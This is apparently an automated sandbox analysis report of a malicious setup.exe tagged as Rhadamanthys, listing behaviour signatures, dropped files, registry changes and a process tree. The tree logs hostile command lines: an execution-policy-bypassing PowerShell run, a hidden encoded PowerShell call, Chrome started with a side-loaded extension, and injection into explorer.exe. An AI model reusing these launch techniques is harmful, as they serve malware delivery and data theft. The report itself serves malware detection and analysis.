Analysis Overview
SHA256
6ac07ce849ad258cf9b47ca9767badc6ee867962cdcbe470cbe0d02ddb7437e8
Threat Level: Known bad
The file setup.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Program crash
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-09 17:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-09 17:17
Reported
2024-02-09 17:47
Platform
win11-20231215-en
Max time kernel
939s
Max time network
1168s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3940 created 2824 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3164 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIAEEF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF40.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD6AC3EC2F0BB8290.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File created | C:\Windows\Installer\e57acf9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAE22.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{32889C47-8C9B-4281-A3AD-9D1BCBCC1C09} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57acfd.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB03D393F9EA60AD8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57acf9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE05CB3B5DCC967EF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB6A9AC84057EB145.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAECF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF20.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID25B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133519726848393191" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B679B08DEE859E7BF68230C84A800740 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707258448 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 74F892A0B540A5F6AEE19F1BF7837B4F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF9C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF99.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF9A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF9B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe
"C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e …
C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2388
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6656 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6816 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6780 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7028 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6192 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6076 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7288 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7552 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7680 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7700 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8212 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8532 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=8032 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=9104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8996 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=8876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9384 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=8616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9672 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=7876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=3376 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=7984 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=7580 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
